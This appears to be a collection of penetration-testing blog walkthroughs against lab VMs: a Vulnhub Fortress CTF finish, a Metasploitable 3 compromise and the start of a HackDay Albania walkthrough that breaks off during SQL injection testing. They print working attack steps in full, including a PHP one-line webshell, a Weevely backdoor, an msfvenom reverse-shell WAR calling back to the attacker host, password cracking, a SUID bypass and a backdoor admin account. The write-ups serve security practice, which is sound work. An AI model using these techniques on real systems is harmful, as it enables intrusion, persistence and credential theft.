<?php

if(isset($_POST['host'])) {
    $cmd = "/usr/local/bin/nmap -F -sT ".$_POST['host'];
    echo "<pre>Command: $cmd\n\n</pre>";

    if (strpos($cmd, ";") !== FALSE || strpos($cmd, "|") !== FALSE || strpos($cmd, "&") !== FALSE) {
        echo "<pre>Nope. Good try though... ?</pre>\n";
    } else {
        $output = shell_exec($cmd);
        echo "<pre>$output</pre>";
    }
}
?>

<img class="logo" src="logo.png">

</div>
</body>
</html>
</pre>
<img class="logo" src="logo.png">

</div>
</body>
</html>

I issued a quick command to locate all 3 flags, next I set out to grab each one.

find / -name flag.txt

/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt

Flag 1

I found flag 1 hiding in the web root with the following commands.

ls

index.html
k1ngd0m_k3yz
logo.png
s1kr3t
scanner.php
styles.css

ls s1kr3t
flag.txt

cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}

Flag 2

For flag 2 I had to dig around the file system a bit more and figure out a password to SSH in. I issued the following commands which confirmed that I had to gain access as the ‘craven’ user to read the flag and also gave me a hint and reminder file.

ls -la /usr/home/craven/

drwxr-xr-x  2 craven  craven   512 Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512 Nov  5 01:59 ..
-rw-r--r--  1 craven  craven  1055 Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5 Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60 Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254 Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163 Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379 Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336 Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802 Nov  5 01:59 .profile
-rw-------  1 craven  craven   281 Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978 Nov  5 01:59 .shrc
-r--------  1 craven  craven    46 Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119 Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77 Nov  5 02:20 reminders.txt

cat /usr/home/craven/hint.txt
Keep forgetting my password, so I made myself a hint. Password is three digits followed by my
pet's name and a symbol.

cat /usr/home/craven/reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha

OK, it looks like I need to create a wordlist with 3 numbers, the pet name of qwerty and a special character. The Crunch tool can do this for me. The command below gives me only 10 character long results starting with 3 digits, followed by the pet name and a special character.

crunch 10 10 -t %%%qwerty^ > craven.txt
Crunch will now generate the following amount of data: 363000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 33000

Now what can I use this for since the instructions said no SSH bruteforcing is needed? Back to the webroot I found snippets from the /etc/passwd and /etc/master.passwd (which is the FreeBSD shadow file equivalent) files.

unshadow passwd shadow > to_crack

cat to_crack 
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002:User &:/home/craven:/bin/sh

john --wordlist=craven.txt to_crack

john --show to_crack
craven:931qwerty?:1002:1002:User &:/home/craven:/bin/sh

1 password hash cracked, 0 left
ls k1ngd0m_k3yz master passwd cat k1ngd0m_k3yz/passwd craven:*:1002:1002:User &:/home/craven:/bin/sh cat k1ngd0m_k3yz/master craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

I saved down the files, unshadowed them and threw the file into John with my fancy wordlist.

unshadow passwd shadow > to_crack

cat to_crack 
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002:User &:/home/craven:/bin/sh

john --wordlist=craven.txt to_crack

john --show to_crack
craven:931qwerty?:1002:1002:User &:/home/craven:/bin/sh

1 password hash cracked, 0 left

With that password I was able to SSH in and grab the second flag.

ssh -l craven 172.16.94.143
Password for craven@fortress:

$ pwd
/usr/home/craven
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Flag 3

The third and final flag was in the /home/vulnhub directory along with a SUID binary.

$ cd /home/vulnhub
$ ls
flag.txt	reader
$ ls -lah
total 56
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  2 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader

The reader binary asks for a file, I fed it the flag.txt and of course it wouldn’t read it.

$ ./reader
./reader [file to read]
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.

I pulled it down to take a look offline. Since we have SSH access its easy with SCP.

scp craven@172.16.94.143:/home/vulnhub/reader /var/www/html
Password for craven@fortress:
reader                                        100% 9022     6.5MB/s   00:00

I took the easy route here and also got a bit lucky. I ran strings against the binary and focused on this section.

%s [file to read]
Checking file type...
Symbolic links not allowed!
Checking if flag file...
flag
Nope. Can't let you have the flag.
Great! Printing file contents...
Win, here's your flag: 

So based on this it looked like I may be able to read the file if I point the binary at another file without ‘flag’ in the filename and creating with a symlink.

$ cd /tmp
$ln /home/vulnhub/flag.txt test
$ cd /home/vulnhub/
$ ./reader /tmp/test 
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag: 
FLAG{its_A_ph0t0_ph1ni5h}

Sweet, it worked! There are likely other paths but this worked for me.

Thanks to superkojiman for putting this CTF together and making it available via Vulnhub. As always thanks to g0tmi1k and the entire Vulnhub team for maintaining these resources.

Metasploitable 3 without Metasploit Part 1

I was excited to see the latest version of Metasploitable provided us with a vulnerable Windows target to practice on. Building and configuring was not difficult once you have all of the dependencies down.  I won’t get too deep into building the box but here are the basics of what I did:

Using a fresh install of Windows 10 I downloaded VirtualBox 5.0.30, Vagrant 1.8.7 and the latest  version of Packer 0.12.0.

I cloned the Git repository here: https://github.com/rapid7/metasploitable3

I decided to  be lazy and use the included Powershell script to auto-build it, I just had to make the following dependency changes in the script so it would run.

I changed:

$virtualBoxMinVersion = "5.1.6"
$packerMinVersion = "0.10.0"
$vagrantMinVersion = "1.8.6"
$vagrantreloadMinVersion = "0.0.1"

to:

$ErrorActionPreference = "Stop"

$virtualBoxMinVersion = "5.0.30"
$packerMinVersion = "0.12.0"
$vagrantMinVersion = "1.8.7"
$vagrantreloadMinVersion = "0.0.1"

This ran for a while but once it was done I  typed

vagrant up

and let this run for a while to pull in all of the configurations. Once this completed I loaded it in VirtualBox and logged in with the credentials vagrant/vagrant to make sure it was working properly. I then exported from VirtualBox as an .ova and imported into my VMware lab set up.

If you have any issues with the set up feel free to leave a comment or hit me up on Twitter.

Here’s a quick walk through for one path to local access as well as privilege escalation using mostly manual techniques.

I started off with an nmap scan of all ports to identify running services.

root@mrb3n:~# nmap -sV -p- -T4 192.168.253.143

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-03 17:22 EST
Nmap scan report for 192.168.253.143
Host is up (0.00038s latency).
Not shown: 65518 filtered ports
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp               Microsoft ftpd
22/tcp    open  ssh               OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
1617/tcp  open  unknown
3000/tcp  open  http              WEBrick httpd 1.3.1 (Ruby 2.3.1 (2016-04-26))
4848/tcp  open  ssl/appserv-http?
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8022/tcp  open  http              Apache Tomcat/Coyote JSP engine 1.1
8080/tcp  open  http-proxy        GlassFish Server Open Source Edition  4.0 
8282/tcp  open  http              Apache Tomcat/Coyote JSP engine 1.1
8484/tcp  open  http              Jetty winstone-2.8
8585/tcp  open  http              Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
9200/tcp  open  wap-wsp?
49153/tcp open  msrpc             Microsoft Windows RPC
49154/tcp open  msrpc             Microsoft Windows RPC
49231/tcp open  unknown

49235/tcp open  unknown

Port 8585 caught my eye as this could be a WAMP installation with webdav possibly enabled.

I browsed to the URL and saw an uploads directory right away, this looked promising.

There is nothing in our uploads directory…yet…

Using Cadaver which is command-line Webdav client I was able to upload the following simple PHP webshell unauthenticated. This webshell lets you run one-off commands and is pretty cumbersome/tedious to work with but its a start!

root@mrb3n:~/Desktop/metasploitable3# cat shell.php
<?php echo shell_exec($_GET['e']); ?>

Our upload succeeded

root@mrb3n:~/Desktop/metasploitable3# cadaver http://192.168.253.143:8585/uploads/
dav:/uploads/> put shell.php
Uploading shell.php to `/uploads/shell.php':
Progress: [=============================>] 100.0% of 38 bytes succeeded.
dav:/uploads/> 

 

A quick test to confirm command execution:

root@mrb3n:~/Desktop/metasploitable3# curl http://192.168.253.143:8585/uploads/shell.php?e=ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 4:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::ad02:4595:821a:bb65%16
   IPv4 Address. . . . . . . . . . . : 192.168.253.143
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter Local Area Connection 3:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::69d3:300:90dd:c46%15
   IPv4 Address. . . . . . . . . . . : 192.168.110.140
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.110.2

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected

   Connection-specific DNS Suffix  . : localdomain

I decided to use Weevely to generate a semi-interactive web shell and uploaded it to the target.

root@mrb3n:~/Desktop/metasploitable3# weevely generate pass123 /root/Desktop/metasploitable3/weevely.php
Generated backdoor with password 'pass123' in '/root/Desktop/metasploitable3/weevely.php' of 1446 byte size.
root@mrb3n:~/Desktop/metasploitable3# weevely http://192.168.253.143:8585/uploads/weevely.php pass123

[+] weevely 3.2.0

[+] Target:	192.168.253.143:8585
[+] Session:	/root/.weevely/sessions/192.168.253.143/weevely_0.session

[+] Browse the filesystem or execute commands starts the connection

[+] to the target. Type :help for more information.

A netstat showed me multiple additional ports listening which explains the second NIC in the ipconfig command results earlier.

metasploitable3:C:\wamp\www\uploads $ netstat -ant

Active Connections

  Proto  Local Address          Foreign Address        State           Offload State

  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:1617           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3000           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3700           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:4848           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:7676           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8019           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8022           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8028           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8031           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8032           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8181           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8282           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8444           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8484           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8585           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8686           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:9200           0.0.0.0:0              LISTENING       InHost      

  TCP    0.0.0.0:9300           0.0.0.0:0              LISTENING       InHost

I had a look around at what other services are installed. Digging into the ‘Apache Software Foundation’ directory we find a Tomcat install along with the tomcat-users.xml file with cleartext credentials for the tomcat manager.

metasploitable3:C:\wamp\www\uploads $ cd "C:\Program Files"
metasploitable3:C:\Program Files $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is AC30-8D23

 Directory of C:\Program Files

12/02/2016  09:26 PM    <DIR>          .
12/02/2016  09:26 PM    <DIR>          ..
12/02/2016  08:47 PM    <DIR>          7-Zip
12/02/2016  08:55 PM    <DIR>          Apache Software Foundation
07/13/2009  07:20 PM    <DIR>          Common Files
12/02/2016  09:26 PM    <DIR>          elasticsearch-1.1.1
11/20/2010  07:33 PM    <DIR>          Internet Explorer
12/02/2016  08:55 PM    <DIR>          Java
12/02/2016  08:58 PM    <DIR>          jenkins
12/02/2016  09:02 PM    <DIR>          jmx
11/26/2016  12:54 AM    <DIR>          OpenSSH
11/26/2016  12:54 AM    <DIR>          Oracle
12/02/2016  09:11 PM    <DIR>          Rails_Server
12/02/2016  08:48 PM    <DIR>          Reference Assemblies
11/20/2010  07:33 PM    <DIR>          Windows Mail
07/13/2009  09:37 PM    <DIR>          Windows NT
12/02/2016  09:01 PM    <DIR>          wordpress
metasploitable3:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ type tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
…………………………SNIP………………………………….
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
  <role rolename="manager-gui"/>
  <user username="sploit" password="sploit" roles="manager-gui"/>
</tomcat-users>

The server.xml file tells us that Tomcat is running on port 8282:

metasploitable3:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ more server.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

..........................snip...............................................

    <!-- A "Connector" represents an endpoint by which requests are received
         and responses are returned. Documentation at :
         Java HTTP Connector: /docs/config/http.html (blocking & non-blocking)
         Java AJP  Connector: /docs/config/ajp.html
         APR (HTTP/AJP) Connector: /docs/apr.html
         Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
    -->
    <Connector port="8282" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    <!-- A "Connector" using the shared thread pool--

Logging in to the Tomcat manager with the credentials sploit:sploit I am able to deploy a malicious WAR file to obtain a reverse shell.

I create a WAR backdoor using msfvenom and unpack it to get the filename of the corresponding .jsp file.

root@mrb3n:~/Desktop/metasploitable3# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.130 LPORT=8443 -f war > shell.war

root@mrb3n:~/Desktop/metasploitable3# unzip shell.war 
Archive:  shell.war
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
   creating: WEB-INF/
  inflating: WEB-INF/web.xml         
  inflating: fmzbtohe.jsp            
  inflating: OONNFiRvYlVcbIh.txt

I deployed the WAR file and confirmed it was successful.

Browsing directly to the directory does not yield us anything, we still need to specify the exact .jsp file.

I next set up a netcat listener and browsed to: http://192.168.253.143:8282/shell/fmzbtohe.jsp

root@mrb3n:~/Desktop/metasploitable3# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.253.130] from (UNKNOWN) [192.168.253.143] 51065
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

I got a hit on my listener and,  hey, a SYSTEM shell.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>whoami
whoami
nt authority\system

I added an administrative user next to set up some persistence.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net user benr pass123 /add
net user benr pass123 /add
The command completed successfully.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net localgroup administrators benr /add
net localgroup administrators benr /add
The command completed successfully.

To get at the other services we need a route tot he 192.168.110.0/24 subnet. I set up some SSH port forwarding using my new administrative user.

root@mrb3n:~/Desktop/metasploitable3# ssh -l benr -D 1080 192.168.253.143 -N -f
benr@192.168.253.143's password:

Edited /etc/proxychains.conf and now I could access all services such as terminal services.

root@mrb3n:~/Desktop/metasploitable3# proxychains nmap -P0 -sT -p 3389 --open -oN tcp.nmap 192.168.110.140
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-04 12:26 EST
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Host Discovery
Parallel DNS resolution of 1 host. Timing: About 0.00% done
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Nmap scan report for 192.168.110.140
Host is up (0.0091s latency).
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

I confirmed that I could log in:

root@mrb3n:~# proxychains rdesktop 192.168.110.140
ProxyChains-3.1 (http://proxychains.sf.net)
Autoselected keyboard map en-us
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
ERROR: SSL_read: 5 (Success)
Disconnected due to network error, retrying to reconnect for 70 minutes.
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.

This was just one quick and easy way to local access and ultimately escalate privileges to SYSTEM. I will add to this post in the future to highlight other paths without the use of Metasploit. I will also do a separate post on the many ways in using Metasploit because it is a great tool/way to start and gain confidence but should not replace honing your manual exploitation skill set.

HackDay: Albania vulnhub walkthrough

Another new VM dropped over at vulnhub. You can grab it here: https://www.vulnhub.com/entry/hackday-albania,167/

The readme comes with the following note: Note: VMware users may have issues with the network interface doing down by default. We recommend (for once!) using Virtualbox.

Well, with a few steps we can get this working on VMware.

I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

	1) sudo su
	2) mount /dev/sda1 /mnt
	3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
	4) Vim /mnt/etc/default/grub and edit the line 
	GRUB_CMDLINE_LINUX="" to read: 
	GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
	5) Poweroff
	6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
	7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
	8) In this shell type "update-grub" then type "exit"
	9) Select "execute a shell in the installer environment", then "poweroff"
       10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

h/t to knightmare for pointing me towards this article:

http://www.itzgeek.com/how-tos/mini-howtos/change-default-network-name-ens33-to-old-eth0-on-ubuntu-16-04.html>

Once that was done I was off and running. Started off with an nmap scan which gave me SSH and an Apache web server on a non-standard port.

root@mrb3n:~/Desktop# nmap -p- -T4 192.168.253.136

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-11-19 19:45 EST
SYN Stealth Scan Timing: About 12.53% done; ETC: 20:00 (0:13:02 remaining)
Nmap scan report for 192.168.253.136
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8008/tcp open  http
MAC Address: 00:0C:29:86:05:34 (VMware)

Well, the whole web app is in Albanian so this will be an extra challenge.

root@mrb3n:~# curl -s http://192.168.253.136:8008/
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>HackDay Albania 2016</title>
	<link rel="stylesheet" href="js/jquery-ui.css">
	<script src="js/jquery-3.1.1.min.js"></script>
	<script src="js/jquery-ui.js"></script>
	<style type="text/css">
		body {
			background-image: url("bg.png");
			background-repeat: no-repeat;
			background-size: cover;
		}
		.ui-draggable .ui-dialog-titlebar{
			background-color: #f05b43;
		}
		.ui-dialog .ui-dialog-title{
			color: white;
		}

	</style>
	<script>
		$(document).ready(function(){
			$("#dialog").dialog();
		});
	</script>
</head>
<body>
	<div id="dialog" title="Miresevini">
  <p>Ne qofte se jam UNE, e di se ku te shkoj ;)</p>
</div>

<!--OK ok, por jo ketu :)-->
</body>

A few very rough translations thanks to Google translate:

Miresevini = Welcome

Ne qofte se jam UNE, e di se ku te shkoj 😉 =  
If I am, I know where to go;)


OK ok, por jo ketu 🙂 = Ok ok, but not here 🙂

Fire Dirb against it and got a robots.txt file and not much else.

root@mrb3n:~# dirb http://192.168.253.136:8008/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 19 22:25:48 2016
URL_BASE: http://192.168.253.136:8008/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.253.136:8008/ ----
+ http://192.168.253.136:8008/index.html (CODE:200|SIZE:750)                   
==> DIRECTORY: http://192.168.253.136:8008/js/                                 
+ http://192.168.253.136:8008/robots.txt (CODE:200|SIZE:702)                   
+ http://192.168.253.136:8008/server-status (CODE:403|SIZE:305)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/ ----
==> DIRECTORY: http://192.168.253.136:8008/js/external/                        
==> DIRECTORY: http://192.168.253.136:8008/js/images/                          
+ http://192.168.253.136:8008/js/index.html (CODE:200|SIZE:165)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/external/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Nov 19 22:25:51 2016
DOWNLOADED: 9224 - FOUND: 4
root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Ok, that’s a bunch to browse to by hand. I check out one and I can only assume most of them are like this:

Google translate tells me this roughly translates to: “Is this the proper directory, or are you a jerk?”

OK, so I’m thinking my next step is to figure out a valid directory. First cut out just the directory names from the robots.txt file:

root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt | cut -f2 -d "/" > robots.txt
root@mrb3n:~# cat robots.txt 
rkfpuzrahngvat
slgqvasbiohwbu
tmhrwbtcjpixcv
vojtydvelrkzex
wpkuzewfmslafy
xqlvafxgntmbgz
yrmwbgyhouncha
zsnxchzipvodib
atoydiajqwpejc
bupzejbkrxqfkd
cvqafkclsyrgle
unisxcudkqjydw
dwrbgldmtzshmf
exschmenuating
fytdinfovbujoh
gzuejogpwcvkpi
havfkphqxdwlqj
ibwglqiryexmrk
jcxhmrjszfynsl
kdyinsktagzotm
lezjotlubhapun
mfakpumvcibqvo
ngblqvnwdjcrwp
ohcmrwoxekdsxq
pidnsxpyfletyr
Qjeotyqzgmfuzs

Prepend the URL to each with awk

root@mrb3n:~# awk '{print "http://192.168.253.136:8008/" $0;}' robots.txt > dir.txt
root@mrb3n:~# cat dir.txt 
http://192.168.253.136:8008/rkfpuzrahngvat
http://192.168.253.136:8008/slgqvasbiohwbu
http://192.168.253.136:8008/tmhrwbtcjpixcv
http://192.168.253.136:8008/vojtydvelrkzex
http://192.168.253.136:8008/wpkuzewfmslafy
http://192.168.253.136:8008/xqlvafxgntmbgz
http://192.168.253.136:8008/yrmwbgyhouncha
http://192.168.253.136:8008/zsnxchzipvodib
http://192.168.253.136:8008/atoydiajqwpejc
http://192.168.253.136:8008/bupzejbkrxqfkd
http://192.168.253.136:8008/cvqafkclsyrgle
http://192.168.253.136:8008/unisxcudkqjydw
http://192.168.253.136:8008/dwrbgldmtzshmf
http://192.168.253.136:8008/exschmenuating
http://192.168.253.136:8008/fytdinfovbujoh
http://192.168.253.136:8008/gzuejogpwcvkpi
http://192.168.253.136:8008/havfkphqxdwlqj
http://192.168.253.136:8008/ibwglqiryexmrk
http://192.168.253.136:8008/jcxhmrjszfynsl
http://192.168.253.136:8008/kdyinsktagzotm
http://192.168.253.136:8008/lezjotlubhapun
http://192.168.253.136:8008/mfakpumvcibqvo
http://192.168.253.136:8008/ngblqvnwdjcrwp
http://192.168.253.136:8008/ohcmrwoxekdsxq
http://192.168.253.136:8008/pidnsxpyfletyr
http://192.168.253.136:8008/qjeotyqzgmfuzs

Open each quick with the web browswer:

root@mrb3n:~# iceweasel $(cat dir.txt)

All but one give us the same error message: /unisxcudkqjydw

Checking it out gives us a hint to another directory:

root@mrb3n:~# curl -s http://192.168.253.136:8008/unisxcudkqjydw/
IS there any /vulnbank/ in there ???

Vulnbank is where we want to be:

root@mrb3n:~# curl -L http://192.168.253.136:8008/unisxcudkqjydw/vulnbank
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /unisxcudkqjydw/vulnbank</title>
 </head>
 <body>
<h1>Index of /unisxcudkqjydw/vulnbank</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/unisxcudkqjydw/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="client/">client/</a></td><td align="right">2016-05-23 00:27  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.253.136 Port 8008</address>
</body></html>

I move onward to the ‘client’ directory and am presented with a login page for the Very Secure Bank.

I throw a single quote in the username field and get the following error message:

I’m feeling lazy so I throw it into sqlmap but something was being filtered in the back end. I couldn’t get sqlmap to work with or without any tamper scripts aside from confirming the SQLi so I turned to Burp.

root@mrb3n:~# sqlmap -u 'http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/login.php' --data='username=*&password=test' --dbms=mysql --risk=3 --level=5 --dbs

………………snip…………………..

[22:48:52] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[22:48:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
